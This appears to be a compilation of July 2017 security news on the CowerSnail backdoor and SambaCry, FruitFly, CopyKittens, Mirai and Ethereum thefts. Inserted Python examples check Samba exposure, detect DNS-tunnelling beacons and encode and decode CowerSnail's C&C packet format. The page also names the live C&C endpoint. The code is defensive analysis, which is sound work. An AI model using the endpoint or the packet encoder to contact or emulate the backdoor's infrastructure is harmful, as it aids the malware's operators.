New Windows Backdoor Linked to SambaCry Linux Malware

26.7.2017 securityweek Virus

The cybercriminals who had recently delivered a cryptocurrency miner to Linux servers by exploiting the Samba vulnerability known as EternalRed and SambaCry are believed to have developed a backdoor designed for Windows systems.

The new malware, detected by Kaspersky Lab products as Backdoor.Win32.CowerSnail, uses the same command and control (C&C) server as the Linux malware, namely cl.ezreal.space:20480.

CowerSnail was created using Qt, a cross-platform development framework. Experts believe its authors may have chosen Qt so they could port their Unix code directly instead of learning the Windows API. On the other hand, while Qt does make it easier to move code between platforms, it significantly increases the size of the resulting file.

Once it infects the system, the malware escalates the priority of its process and starts communicating with its C&C server through the IRC protocol.

CowerSnail can collect information about the compromised machine, execute commands, install or uninstall itself as a service, and receive updates.

After it harvests system information and sends it back to the C&C domain, the malware exchanges pings with the server and waits for commands from the attackers.

“After creating two separate Trojans, each designed for a specific platform and each with its own peculiarities, it is highly probable that this group will produce more malware in the future,” explained Kaspersky’s Sergey Yunakovsky.

The SambaCry vulnerability exploited by the Linux malware linked to this threat actor, CVE-2017-7494, can be exploited to upload a shared library to a writable share and cause the server to load that library. This allows a remote attacker to execute arbitrary code on the targeted system.

The security hole, patched in May, affects products from several vendors, including routers and network-attached storage (NAS) appliances. In fact, a piece of malware spotted by Trend Micro in early July leverages SambaCry to target NAS devices, particularly ones used by small and medium-sized businesses.


Tech Giants Announce Plans for Removal of Flash

26.7.2017 securityweek IT

Apple, Facebook, Google, Microsoft and Mozilla have outlined their plans for moving away from Flash Player now that Adobe officially announced an end-of-life (EOL) and end-of-support date for the controversial product.

Adobe announced on Tuesday that, following discussions with several technology partners, it has decided to stop updating and distributing Flash Player at the end of 2020. The company has encouraged developers and content creators to migrate to open standards such as HTML5, WebGL and WebAssembly, which are supported by all major web browsers.

While Flash Player is still used by many websites and applications, the security community has been asking Adobe to retire the old software for several years due to the large number of vulnerabilities and numerous attacks involving Flash exploits.

Over the past years, web browser vendors and other Internet companies have taken steps to reduce the security risks associated with Flash Player by either limiting Flash content or banning it altogether.

Apple, Facebook, Google, Microsoft and Mozilla have promised to help with the transition and they have each outlined their plans for the complete removal of Flash support from their products.

Apple has been moving away from Flash since 2010. Currently, users need to manually install Flash if they need it and even so it remains disabled by default – manual approval is required on each website before the Flash plugin is executed.

Facebook, which still allows Flash games on its platform, says it has partnered with game developers to help them migrate to HTML5. The social media giant will accept Flash games until the end of 2020, but warned that the ability to play these games also depends on the decisions made by browser vendors.

Google pointed out that the number of Chrome users visiting a site with Flash every day has dropped from 80 percent three years ago to 17 percent today. Google has been and will continue to gradually phase out Flash – first by asking for explicit permission to run Flash content in more situations and eventually disabling it by default. The company wants to remove it completely toward the end of 2020.

Microsoft, which updates the Flash Player components used by its products every Patch Tuesday, wants to disable Flash by default in both Edge and Internet Explorer in mid-to-late 2019. Even if users re-enable it, they will still need to approve Flash manually for each website. Flash will be removed completely by the end of 2020.

Mozilla’s roadmap for Flash is similar. The organization wants to disable Flash by default for most users in 2019, while allowing Extended Support Release (ESR) users to continue viewing Flash content through the end of 2020.


New CowerSnail Windows Backdoor linked to SHELLBIND SambaCry Linux Malware
26.7.2017 securityaffairs Virus

Malware researchers at Kaspersky Lab have found a new Windows backdoor dubbed CowerSnail linked to the recently discovered SHELLBIND SambaCry Linux malware.

SHELLBIND mostly targets network-attached storage (NAS) appliances. It exploits the Samba vulnerability (also known as SambaCry and EternalRed) to upload a shared library to a writable share and then cause the server to load that library.

This trick allows a remote attacker to execute arbitrary code on the targeted system.
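As an added practitioner check (not code from Kaspersky, Trend Micro or any of the outlets quoted on this page), the following Python script assesses whether a Samba host is exposed to the CVE-2017-7494 technique described here and in the SambaCry paragraph of the first article: it parses an smb.conf for writable shares, checks whether the "nt pipe support = no" workaround from the Samba advisory is present in the [global] section, and compares the reported version against the fixed releases named in that advisory (4.4.14, 4.5.10 and 4.6.4; the advisory states that all versions from 3.5.0 onwards are affected, and the 4.0–4.3 branches were out of support and received no fix). The sample configuration and version string are constructed for the example.

```python
"""Added example: assess a Samba host for exposure to CVE-2017-7494 (SambaCry)."""
import re

# Releases that shipped the fix, per the Samba advisory for CVE-2017-7494.
FIXED_RELEASES = {(4, 4): (4, 4, 14), (4, 5): (4, 5, 10), (4, 6): (4, 6, 4)}
FIRST_AFFECTED = (3, 5, 0)      # advisory: all versions from 3.5.0 onwards
FIRST_CLEAN_BRANCH = (4, 7, 0)  # 4.7 and later were released with the fix


def parse_version(text):
    """Pull (major, minor, patch) out of output such as 'Version 4.5.8-Debian'."""
    match = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not match:
        raise ValueError("no Samba version found in %r" % text)
    return tuple(int(part) for part in match.groups())


def version_is_vulnerable(version):
    """True if the upstream release predates the fix. Distributions backport
    fixes without bumping the version, so treat True as a hint, not proof."""
    if version < FIRST_AFFECTED or version >= FIRST_CLEAN_BRANCH:
        return False
    fixed = FIXED_RELEASES.get(version[:2])
    if fixed is None:
        return True   # 3.5.x up to 4.3.x were out of support and never patched
    return version < fixed


def parse_smb_conf(text):
    """Minimal smb.conf parser: {section: {key: value}} with lower-cased,
    whitespace-normalised keys. 'include' lines and registry config are ignored."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            conf.setdefault(section, {})
        elif "=" in line and section is not None:
            key, _, value = line.partition("=")
            conf[section][" ".join(key.lower().split())] = value.strip().lower()
    return conf


def share_is_writable(opts):
    """'read only = no', 'writable = yes' and 'writeable = yes' are synonyms
    in Samba; 'read only' is given precedence here for simplicity."""
    if "read only" in opts:
        return opts["read only"] in ("no", "false", "0")
    for key in ("writable", "writeable"):
        if key in opts:
            return opts[key] in ("yes", "true", "1")
    return False  # Samba's default is 'read only = yes'


def assess(conf_text, version_text):
    """Combine the three signals into one verdict."""
    conf = parse_smb_conf(conf_text)
    workaround = conf.get("global", {}).get("nt pipe support") == "no"
    writable = sorted(name for name, opts in conf.items()
                      if name != "global" and share_is_writable(opts))
    vulnerable = version_is_vulnerable(parse_version(version_text))
    return {
        "vulnerable_version": vulnerable,
        "nt_pipe_support_disabled": workaround,
        "writable_shares": writable,
        "exposed": vulnerable and bool(writable) and not workaround,
    }


# Constructed sample input: one guest-writable share, workaround commented out.
SAMPLE_CONF = """
[global]
   workgroup = WORKGROUP
   # nt pipe support = no

[public]
   path = /srv/samba/public
   guest ok = yes
   read only = no

[docs]
   path = /srv/samba/docs
   writable = no
"""
SAMPLE_VERSION = "Version 4.5.8-Debian"   # constructed stand-in for 'smbd --version' output

if __name__ == "__main__":
    print(assess(SAMPLE_CONF, SAMPLE_VERSION))
```

Because vendors backport the patch without changing the version string, a "vulnerable_version" verdict should be confirmed against the package changelog; the parser also does not follow "include" directives, so run it against the effective configuration (for example the output of "testparm -s").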

SHELLBIND and Backdoor.Win32.CowerSnail share the same command and control (C&C) server (cl.ezreal.space:20480).

“We recently reported about SambaCry, a new family of Linux Trojans exploiting a vulnerability in the Samba protocol. A week later, Kaspersky Lab analysts managed to detect a malicious program for Windows that was apparently created by the same group responsible for SambaCry.” states Kaspersky. “It was the common C&C server that both programs used – cl.ezreal.space:20480 – that suggested a relationship between them.”

The CowerSnail backdoor was developed with the cross-platform framework Qt, a design choice that allowed malicious code written for Unix platforms to be migrated quickly to Windows.

SambaCry was designed for *nix-based systems; CowerSnail was written using Qt because the author did not want to go into the details of WinAPI and preferred to migrate the *nix code “as is”.

The drawback of using Qt is the size of the resulting file: the framework makes it easier to move code between platforms, but it significantly inflates the binary.

“This framework provides benefits such as cross-platform capability and transferability of the source code between different operating systems. This, however, has an effect on the resulting file size: the user code ends up as a small proportion of a large 3 MB file.” continues Kaspersky.

CowerSnail first escalates the process priority and the current thread’s priority, then it starts communicating with its Command & Control server through the IRC protocol.

CowerSnail implements classic backdoor features. It can collect information about the infected system (timestamp, installed OS type, OS name, host name, network interfaces, ABI, processor architecture and physical memory), execute commands, install or uninstall itself as a service, and receive updates.

The experts believe that the same threat actor has developed the two Trojans, each designed for a specific purpose.

“After creating two separate Trojans, each designed for a specific platform and each with its own peculiarities, it is highly probable that this group will produce more malware in the future,” concluded Kaspersky Lab.


CrowdStrike presented the fastest and largest cybersecurity search engine
26.7.2017 securityaffairs Cyber

Security firm CrowdStrike, which describes itself as the leader in cloud-delivered endpoint protection, has announced the CrowdStrike Falcon Search Engine, an addition to its Falcon platform that the company calls the fastest and largest cybersecurity search engine.

The search engine is powered by Falcon MalQuery, which CrowdStrike claims is more than 250 times faster than other malware search tools.

MalQuery relies on a patent-pending indexing technology that allows users to search in real time across a huge repository of threat events and malicious code.

The company has indexed more than 700 million files totaling over 560 TB of malware, and it collects more than 50 billion security events every day.

“This platform has grown to be the largest and most active repository of threat events and artifacts in the industry, indexing over 50 billion events per day and amassing a 560TB collection of 700 million files,” reads the announcement published by CrowdStrike. “CrowdStrike’s patent pending indexing technology makes all of this data available for real-time search. Organizations can now search for malware — both metadata and binary content — and get results from the Falcon platform in seconds.”


Users can query the system with plain text (ASCII and Unicode) or binary (hex) searches, as well as with YARA rules. The results are augmented “with CrowdStrike intelligence so the severity and context of the threat is clear.”


“Today’s threat landscape demands speed and precision – some of the best minds in cybersecurity are hampered by slow search tools and limited data sets. We believe that real-time data access is how cybersecurity professionals can get ahead of modern-day threats, and we’ve built the fastest AI-enabled platform that makes this possible,” said George Kurtz, CrowdStrike co-founder and CEO.

“With today’s launch, we are fundamentally changing the game by empowering threat researchers to outpace the adversary with this solution. CrowdStrike Falcon Search Engine enables the next-gen SOC to be more productive and acts as a powerful force multiplier for security teams,” Kurtz added.

The company also recently announced a partnership with the security firm Dragos to provide cybersecurity services for industrial control systems (ICS).


Gang Behind Fireball Malware that Infected 250 Million PCs Busted by Police
26.7.2017 thehackernews Virus


Chinese authorities have recently initiated a crackdown on the operators of a massive adware campaign that infected around 250 Million computers, including Windows and Mac OS, across the world earlier this year.
The adware campaign was uncovered by security researchers at Check Point last month after it already infected over 25 million computers in India, 24 million in Brazil, 16 million in Mexico, 13 million in Indonesia and 5.5 million in the United States.
Dubbed Fireball, the infamous adware comes bundled with other free legitimate software that you download off the Internet.
Once installed, the malware installs browser plug-ins to manipulate the victim's web browser configurations and replace their default search engines and home pages with fake search engines.
Beyond injecting ads, Fireball can spy on the victim's web traffic, execute arbitrary code on the infected computer, install plugins and drop additional malware, creating a massive security hole in affected systems and networks.
At the time, Check Point researchers linked the operation to Rafotech, a Beijing-based Chinese firm which claims to offer digital marketing and game apps to 300 million customers, blaming the company for using Fireball for generating revenue by injecting ads into the web browsers.
Now, Beijing Municipal Public Security Bureau Network Security Corps have made 11 arrests in the case.
All the suspects are Rafotech employees; three of them served as the company's president, technical director and operations director, Chinese news agencies report.
Chinese outlets report that the Fireball developers made a profit of 80 Million Yuan (nearly US$12 million) from the adware campaign.
Rafotech was founded by several partners in 2015, and by the end of that year they had developed the Fireball software for advertising fraud: it redirects the victim's every search query to Yahoo.com or Google.com and includes tracking pixels that collect the victim's information.
All the arrested suspects have allegedly admitted to developing and distributing Fireball. The arrests began in June, shortly after the story about Fireball was published.
The company undoubtedly used the Fireball adware to boost its advertising revenue, but the same adware can distribute additional malware, which could have become a far more serious problem in future.


CowerSnail, from the creators of SambaCry
26.7.2017 Kaspersky Virus

We recently reported about SambaCry, a new family of Linux Trojans exploiting a vulnerability in the Samba protocol. A week later, Kaspersky Lab analysts managed to detect a malicious program for Windows that was apparently created by the same group responsible for SambaCry. It was the common C&C server that both programs used – cl.ezreal.space:20480 – that suggested a relationship between them.

Kaspersky Lab products detect the new malicious program as Backdoor.Win32.CowerSnail. MD5: 5460AC43725997798BAB3EB6474D391F

CowerSnail was compiled using Qt and linked with various libraries. This framework provides benefits such as cross-platform capability and transferability of the source code between different operating systems. This, however, has an effect on the resulting file size: the user code ends up as a small proportion of a large 3 MB file.

First stage

First of all, CowerSnail escalates the process priority and the current thread’s priority.

Then it uses the StartServiceCtrlDispatcher API to launch the main C&C communication thread as a control manager service.

If the thread is successfully launched as a service, further communication with the C&C is carried out through that service; otherwise, CowerSnail operates without it. CowerSnail can also accept various variables as input, such as the C&C host. When these are absent, the required data is extracted from the file itself.

Invoking the main C&C communication method will look like this in the control service routine (the method is stated as ‘route’).

C&C server communication

Traffic analysis shows that the bot communicates with the C&C via the IRC protocol. This can be seen from the characteristic ‘CHANNEL’ command and the subsequent exchange of pings, which often occurs in IRC botnets made up of IoT devices.

The first two bytes are the ‘pk’ signature which occurs in each packet except the CHANNEL command. The DWORD that follows is the size of the remaining part of the packet:

The name of each field is encoded in Unicode and is preceded by field length. The RequestReturn/Request DWORD coming after the status bar shows the number of variables for the variable RequestReturn. In this example, there are three variables: ‘success’, ‘I’ and ‘result’. Each of these fields, in turn, can contain more nested variables. The screenshot below shows the response to the SysInfo request in which CowerSnail sends 14 (0xE) different strings containing information about the infected system. The type of variable is stated after its name, followed by its value.

The structures of the request packet and the response packet are slightly different. The server’s request includes the request name coded as Request->arg->type->”Ping/SysInfo/Install”, as well as extra parameters that are nested into the arg field.

Here are examples of several variable types:

0x00000005 – Integer variable

0x0000000A – String variable
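The framing described above (the ‘pk’ signature, the DWORD size of the remainder, length-prefixed Unicode field names, a type DWORD and the two variable type codes) is enough to write an encoder and a bounds-checked decoder, which is what a traffic analyst needs to dissect a capture or to generate test packets for a detection rule. The block below is an added example written for this page, not Kaspersky's code or a reimplementation of the malware. Only the signature, the size DWORD, the field-count DWORD and the type codes 0x05 and 0x0A are taken from the text; byte order (little-endian), string encoding (UTF-16LE), length units (UTF-16 code units) and the exact layout of the field-count are assumptions, and nested variables are omitted. The sample response is constructed to mirror the three-variable ‘success’/‘I’/‘result’ example mentioned above.

```python
"""Added example: encoder/decoder for the CowerSnail-style packet framing
described above. Type codes and the 'pk' + DWORD-length header come from the
page; byte order, string encoding and length units are assumptions."""
import struct

SIGNATURE = b"pk"
TYPE_INT = 0x00000005      # integer variable (from the page)
TYPE_STRING = 0x0000000A   # string variable (from the page)
HEADER_LEN = len(SIGNATURE) + 4

# Assumptions not stated on the page: DWORDs are little-endian, names and
# string values are UTF-16LE, and their length prefix counts UTF-16 code units.


def _u32(value):
    return struct.pack("<I", value)


def _utf16(text):
    data = text.encode("utf-16-le")
    return _u32(len(data) // 2) + data


def encode_field(name, value):
    """name + type DWORD + value; ints are one DWORD, strings are length-prefixed."""
    if isinstance(value, bool) or not isinstance(value, (int, str)):
        raise TypeError("only int and str values are supported")
    if isinstance(value, int):
        return _utf16(name) + _u32(TYPE_INT) + _u32(value & 0xFFFFFFFF)
    return _utf16(name) + _u32(TYPE_STRING) + _utf16(value)


def encode_packet(fields):
    """'pk' + size-of-rest + field count + fields (flat; nesting omitted)."""
    body = _u32(len(fields)) + b"".join(encode_field(n, v) for n, v in fields)
    return SIGNATURE + _u32(len(body)) + body


class _Reader:
    """Bounds-checked cursor so truncated or hostile input raises instead of misparsing."""
    def __init__(self, buf):
        self.buf, self.pos = buf, 0

    def u32(self):
        if self.pos + 4 > len(self.buf):
            raise ValueError("truncated DWORD at offset %d" % self.pos)
        (value,) = struct.unpack_from("<I", self.buf, self.pos)
        self.pos += 4
        return value

    def utf16(self):
        nbytes = self.u32() * 2
        if self.pos + nbytes > len(self.buf):
            raise ValueError("string runs past end of packet at offset %d" % self.pos)
        text = self.buf[self.pos:self.pos + nbytes].decode("utf-16-le")
        self.pos += nbytes
        return text


def decode_packet(data):
    """Inverse of encode_packet; returns a list of (name, value) pairs."""
    if not data.startswith(SIGNATURE):
        raise ValueError("missing 'pk' signature (CHANNEL command or unrelated traffic?)")
    reader = _Reader(data[len(SIGNATURE):])
    size = reader.u32()
    if size != len(data) - HEADER_LEN:
        raise ValueError("declared size %d does not match %d bytes present"
                         % (size, len(data) - HEADER_LEN))
    fields = []
    for _ in range(reader.u32()):
        name = reader.utf16()
        vtype = reader.u32()
        if vtype == TYPE_INT:
            fields.append((name, reader.u32()))
        elif vtype == TYPE_STRING:
            fields.append((name, reader.utf16()))
        else:
            raise ValueError("unknown variable type 0x%08X for %r" % (vtype, name))
    return fields


def split_stream(stream):
    """Frame back-to-back packets from a captured TCP stream.
    Returns (decoded packets, unconsumed trailing bytes)."""
    packets = []
    while len(stream) >= HEADER_LEN and stream.startswith(SIGNATURE):
        (size,) = struct.unpack_from("<I", stream, len(SIGNATURE))
        if len(stream) < HEADER_LEN + size:
            break   # wait for the rest of this packet
        packets.append(decode_packet(stream[:HEADER_LEN + size]))
        stream = stream[HEADER_LEN + size:]
    return packets, stream


# Constructed sample mirroring the three-variable response mentioned above.
SAMPLE_RESPONSE = encode_packet([("success", 1), ("I", 0), ("result", "Windows")])

if __name__ == "__main__":
    print(SAMPLE_RESPONSE.hex())
    print(decode_packet(SAMPLE_RESPONSE))
```

The decoder checks every length against the bytes actually present before reading, which is the property a dissector needs when it is pointed at hostile traffic; the stream splitter stops at the first frame that is not yet complete so it can be fed successive TCP segments.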

After registering the infected host at the C&C server, which includes sending information about the infected system, CowerSnail exchanges pings with the server and waits for commands.

Commands

Unlike SambaCry, CowerSnail does not download cryptocurrency mining software by default, but instead provides a standard set of backdoor functions:

Receive update (LocalUpdate)
Execute any command (BatchCommand)
Install CowerSnail as a service, using the Service Control Manager command line interface (Install)
Uninstall CowerSnail from service list (Uninstall)
Collect system information:
Timestamp
Installed OS type (e.g. Windows)
OS name
Host name
Information about network interfaces
ABI
Core processor architecture
Information about physical memory

Conclusion

SambaCry was designed for *nix-based systems. CowerSnail, meanwhile, was written using Qt, which most probably means the author didn’t want to go into the details of WinAPI, and preferred to transfer the *nix code “as is”. This fact, along with the same C&C being used by both programs, strongly suggests that CowerSnail was created by the same group that created SambaCry. After creating two separate Trojans, each designed for a specific platform and each with its own peculiarities, it is highly probable that this group will produce more malware in the future.


Experts Unveil Cyber Espionage Attacks by CopyKittens Hackers
26.7.2017 thehackernews  CyberSpy
Security researchers have discovered a new, massive cyber espionage campaign that mainly targets people working in government, defence and academic organisations in various countries.
The campaign is being conducted by an Iran-linked threat group, whose activities, attack methods, and targets have been released in a joint, detailed report published by researchers at Trend Micro and Israeli firm ClearSky.
Dubbed CopyKittens by researchers, the cyber espionage group has been active since at least 2013 and has targeted organisations and individuals, including diplomats and researchers, in Israel, Saudi Arabia, Turkey, the United States, Jordan and Germany.
The targeted organisations include government institutions like Ministry of Foreign Affairs, defence companies, large IT companies, academic institutions, subcontractors of the Ministry of Defense, and municipal authorities, along with employees of the United Nations.
The latest report [PDF], dubbed "Operation Wilted Tulip," details an active espionage campaign conducted by the CopyKittens hackers, a vast range of tools and tactics they used, its command and control infrastructure, and the group's modus operandi.
How CopyKittens Infects Its Targets
The group used different tactics to infiltrate their targets, which includes watering hole attacks — wherein JavaScript code is inserted into compromised websites to distribute malicious exploits.
The news media and organisations whose websites were abused in watering hole attacks include The Jerusalem Post, for which even the German Federal Office for Information Security (BSI) issued an alert, Maariv news and the IDF Disabled Veterans Organization.
Besides watering hole attacks, CopyKittens also used other methods to deliver malware, including:
Emailed links to malicious websites controlled by attackers.
Weaponized Office documents exploiting recently discovered flaw (CVE-2017-0199).
Exploitation of web servers using vulnerability scanners and SQL injection tools such as Havij, sqlmap and Acunetix.
Fake social media entities to build trust with targets and potentially spread malicious links.
"The group uses a combination of these methods to persistently target the same victim over multiple platforms until they succeed in establishing an initial beachhead of infection – before pivoting to higher value targets on the network," Trend Micro writes in a blog post.
To infect its targets, CopyKittens combines its own custom malware, such as the TDTESS backdoor, with existing commercial and open-source tools, including the red team framework Cobalt Strike, Metasploit, the post-exploitation agent Empire and the credential-dumping tool Mimikatz.
The group's self-developed remote access trojan, dubbed Matryoshka, uses DNS for command and control (C&C) communication and can steal passwords, capture screenshots, record keystrokes, collect and upload files, and give the attackers Meterpreter shell access.
"Matryoshka is spread through spear phishing with a document attached to it. The document has either a malicious macro that the victim is asked to enable or an embedded executable the victim is asked to open," Clear Sky says in a blog post.
The initial version of the malware was analysed in 2015 and seen in the wild from July 2016 until January 2017; the group has since developed and used Matryoshka version 2.
Users are advised to enable two-factor authentication on their webmail accounts, which are a treasure trove of information for attackers and, in the researchers' words, an "extremely strong initial beachhead" for pivoting to other targets.
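Matryoshka's use of DNS for C&C is the detail a SOC can act on: a DNS-tunnelling channel tends to produce many unique, long, high-entropy subdomains under one registered domain, often as TXT lookups, which ordinary browsing does not. The following is an added example written for this page (not a tool from Trend Micro or ClearSky, and not a description of Matryoshka's actual encoding) that scores a constructed query log on exactly those three properties. The log format, the thresholds, the "updates-cdn.example" placeholder domain and the two-label registered-domain heuristic are all assumptions; a production version would consume the resolver's real log format and use the Public Suffix List.

```python
"""Added example: flag domains whose query pattern looks like DNS-based C&C
(many unique, long, high-entropy subdomains in a constructed query log)."""
import math
import re
from collections import Counter, defaultdict

# Constructed log format: '<timestamp> <client> <qtype> <qname>' (one query per line).
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qtype>[A-Z]+)\s+(?P<qname>\S+)$")


def shannon_entropy(text):
    """Bits per character; encoded data scores high, dictionary words score low."""
    if not text:
        return 0.0
    counts = Counter(text)
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())


def split_name(qname):
    """Naive split into (registered domain, subdomain). Assumes a one-label TLD;
    a real deployment would use the Public Suffix List."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def parse_line(line):
    match = LOG_RE.match(line.strip())
    return match.groupdict() if match else None


def score_dns_log(lines, min_unique=8, min_entropy=3.0, min_len=20):
    """Return {registered domain: stats} for domains exceeding all three thresholds."""
    per_domain = defaultdict(lambda: {"subs": set(), "clients": set(), "qtypes": Counter()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue          # unparseable lines are skipped, not fatal
        domain, sub = split_name(rec["qname"])
        if not sub:
            continue          # apex queries carry no subdomain to score
        st = per_domain[domain]
        st["subs"].add(sub)
        st["clients"].add(rec["client"])
        st["qtypes"][rec["qtype"]] += 1
    flagged = {}
    for domain, st in per_domain.items():
        subs = st["subs"]
        avg_entropy = sum(shannon_entropy(s) for s in subs) / len(subs)
        avg_len = sum(len(s) for s in subs) / len(subs)
        if len(subs) >= min_unique and avg_entropy >= min_entropy and avg_len >= min_len:
            flagged[domain] = {
                "unique_subdomains": len(subs),
                "avg_entropy": round(avg_entropy, 2),
                "avg_subdomain_len": round(avg_len, 1),
                "clients": len(st["clients"]),
                "qtypes": dict(st["qtypes"]),
            }
    return flagged


def _constructed_beacons(n):
    """n distinct 32-char labels in which every hex digit appears exactly twice,
    so each has an entropy of exactly 4 bits per character."""
    hexd = "0123456789abcdef"
    return [hexd[i:] + hexd[:i] + hexd[::-1] for i in range(n)]


# Constructed sample: ten TXT lookups from one host to beacon-like names, plus
# ordinary browsing noise. 'updates-cdn.example' is a placeholder, not a real IoC.
SAMPLE_LOG = [
    "2017-07-26T10:00:%02dZ 10.0.0.5 TXT %s.updates-cdn.example." % (i, b)
    for i, b in enumerate(_constructed_beacons(10))
] + [
    "2017-07-26T10:01:00Z 10.0.0.5 A www.example.org.",
    "2017-07-26T10:01:01Z 10.0.0.7 A mail.example.org.",
    "2017-07-26T10:01:02Z 10.0.0.7 AAAA www.example.org.",
    "2017-07-26T10:01:03Z 10.0.0.9 A cdn.example.net.",
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for domain, stats in score_dns_log(SAMPLE_LOG).items():
        print(domain, stats)
```

The three thresholds deliberately have to hold together: CDNs produce many unique subdomains but short, low-entropy ones, and a single long hash-like label (a cache-buster) fails the uniqueness test, so only sustained beaconing trips the rule. Tune the numbers against a baseline of your own resolver logs before alerting on them.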


Hacker Steals $8.4 Million in Ethereum (4th Heist In A Month)
26.7.2017 thehackernews Incident
More Ethereum Stolen!
An unknown hacker has just stolen nearly $8.4 Million worth of Ethereum – one of the most popular and increasingly valuable cryptocurrencies – in yet another Ethereum hack that hit Veritaseum's Initial Coin Offering (ICO).
This incident marks the fourth Ethereum hack this month and the second attack on an ICO, following the theft of $7 million worth of Ether during the hack of Israeli startup CoinDash's initial coin offering last week.
A few days ago, a hacker also stole nearly $32 million worth of Ether from multi-signature wallets by exploiting a critical vulnerability in Parity's Ethereum wallet software, and earlier this month the cryptocurrency exchange Bithumb lost around $1 million worth of Ether and Bitcoin.
Now, Veritaseum has confirmed that a hacker stole $8.4 Million in Ether (ETH) from its ICO this Sunday, July 23.
"We were hacked, possibly by a group. The hack seemed to be very sophisticated, but there's at least one corporate partner that may have dropped the ball and be liable. We will let the lawyers sort that out if it goes that far," Veritaseum founder Reggie Middleton confirmed the theft on the BitcoinTalk forum.
Middleton has called the hack "inconsequential", suggesting that one of the company's unnamed corporate partners may be responsible for the breach.
Middleton said that, given the high demand for VERI tokens during the ICO held over the weekend, the hacker first stole the tokens and then immediately sold them to other buyers "within a few hours" for Ether.
The hacker made off with an estimated $8.4 million in ETH in that relatively short period. The stolen funds were first moved into two separate Ethereum wallets and then on to other accounts.
Around 37,000 of the 100 million VERI tokens were stolen. The good news is that the theft does not affect ICO investors, as Middleton says the stolen tokens belonged to him and his team.
"There are 100M tokens issued; the hackers stole about 37k. As I said, it is quite disconcerting, but it is not the end [of] the world. In the scheme of things, this is small," Middleton says.
"The tokens were stolen from me, not the token buyers. I am not downplaying the seriousness of the heist either, but I am looking at the heist for what it is. A company that we use was compromised, the vulnerability was closed, and we are investigating whether we should move against that company or not."
At the moment, Middleton did not disclose the attack vector that was exploited to sweep out $8.4 Million in ETH, though he assured users that his team had taken necessary measures to prevent the attack from happening in the future.


Apple Users, Beware! A Nearly-Undetectable Malware Targeting Mac Computers
26.7.2017 thehackernews  Apple
Yes, even Macs can get malware that silently spies on their users. So if you own a Mac and think you are immune, you are wrong.
An unusual piece of malware that can remotely control the webcam, screen, mouse and keyboard, and install additional malicious software, has been infecting hundreds of Mac computers for years, and it was only detected a few months ago.
Dubbed FruitFly, the Mac malware was initially detected earlier this year by Malwarebytes researcher Thomas Reed, and Apple quickly released security patches to address the dangerous malware.
Now, months later, Patrick Wardle, a former NSA analyst and now chief security researcher at the security firm Synack, has discovered around 400 Mac computers in the wild infected with a newer strain of the FruitFly malware (FruitFly 2).
Wardle believes the number of infected Macs with FruitFly 2 would likely be much higher, as he only had access to some servers used to control FruitFly.
Although it is unknown who is behind FruitFly or how it gets onto Macs, the researchers believe the malware may have been active for around ten years; some of its code dates back as far as 1998.
"FruitFly, the first OS X/macOS malware of 2017, is a rather intriguing specimen. Selectively targeting biomedical research institutions, it is thought to have flown under the radar for many years," Wardle wrote in the abstract of his talk, which he is going to present at the Black Hat later this week.
Since the initial infection vector is unclear, FruitFly, like most malware, could be arriving through compromised websites, phishing emails or a booby-trapped application.
FruitFly is surveillance malware that's capable of executing shell commands, moving and clicking a mouse cursor, capturing webcam, killing processes, grabbing the system's uptime, retrieving screen captures, and even alerting the hacker when victims are again active on their Mac.
"The only reason I can think of that this malware has not been spotted before now is that it is being used in very tightly targeted attacks, limiting its exposure," Reed wrote in the January blog post.
"Although there is no evidence at this point linking this malware to a specific group, the fact that it has been seen specifically at biomedical research institutions certainly seems like it could be the result of exactly that kind of espionage."
Wardle was able to identify FruitFly victims by registering a backup command and control (C&C) domain once used by the attacker; around 400 infected Macs then started connecting to his server.
From there, the researcher was also able to see IP addresses of FruitFly infected victims, indicating 90 percent of victims were located in the United States.
Wardle was even able to see the name of victims' Macs as well, making it "really easy to pretty accurately say who is getting infected," he told Forbes.
Rather than taking over those computers or spying on the victims, Wardle handed over what he found to law enforcement, which is now investigating.
Wardle believes surveillance was the primary purpose of FruitFly, though it is unclear whether a government or another group is behind it.
"This did not look like cyber crime type behaviour; there were no ads, no keyloggers, or ransomware," Wardle said. "Its features had looked like they were actions that would support interactivity—it had the ability to alert the attacker when users were active on the computer, it could simulate mouse clicks and keyboard events."
Because FruitFly's code includes Linux shell commands, much of it would also work on Linux, so a Linux variant of FruitFly would not come as a surprise.


British Hacker Admits Using Mirai Botnet to DDoS Deutsche Telekom
26.7.2017 thehackernews BotNet
A 29-year-old British man, identified by the authorities only as "Daniel K.", pleaded guilty in a German court on Friday to charges related to the hijacking of more than one million Deutsche Telekom routers.
According to reports in the German press, the man, who used the online monikers "Peter Parker" and "Spiderman" for domains involved in attacks powered by the notorious Mirai malware, pleaded guilty to "attempted computer sabotage."
The suspect was arrested on 22nd February this year at Luton airport in London by Britain's National Crime Agency (NCA) at the request of the Federal Criminal Police Office of Germany, aka the Bundeskriminalamt (BKA).
The hacker, also known as 'BestBuy,' admitted to the court on Friday that he was behind the cyber attack that knocked more than 1.25 Million customers of German telecommunications provider Deutsche Telekom offline last November.
According to the German authorities, the attack was particularly severe: it was carried out to compromise home routers and enrol them in a network of hijacked devices, popularly called a botnet, which was being offered for sale on dark web markets for launching DDoS attacks.
Late last year, Deutsche Telekom's routers became infected with a modified version of Mirai, the infamous IoT malware that scans for insecure routers, cameras, DVRs and other IoT devices and enslaves them into a botnet, causing over a million pounds' worth of damage, the company said at the time.
Mirai is the same botnet that disrupted large parts of the Internet last year with massive distributed denial-of-service (DDoS) attacks against the DNS provider Dyn, crippling some of the world's biggest websites, including Twitter, Netflix, Amazon, Slack and Spotify.
Mirai-based attacks surged after a cybercriminal publicly released the malware's source code in October 2016; many other criminals have since used it to launch DDoS attacks.
The hacker reportedly told the court that a Liberian internet service provider (ISP) paid him $10,000 to attack its competitors, and that Deutsche Telekom was not the main target of the attack.
At the time of his arrest, the suspect faced up to 10 years in prison. He's due to be sentenced on July 28.
The BKA got involved in the investigation as the attack on Deutsche Telekom was deemed to be a threat to the nation's communication infrastructure.
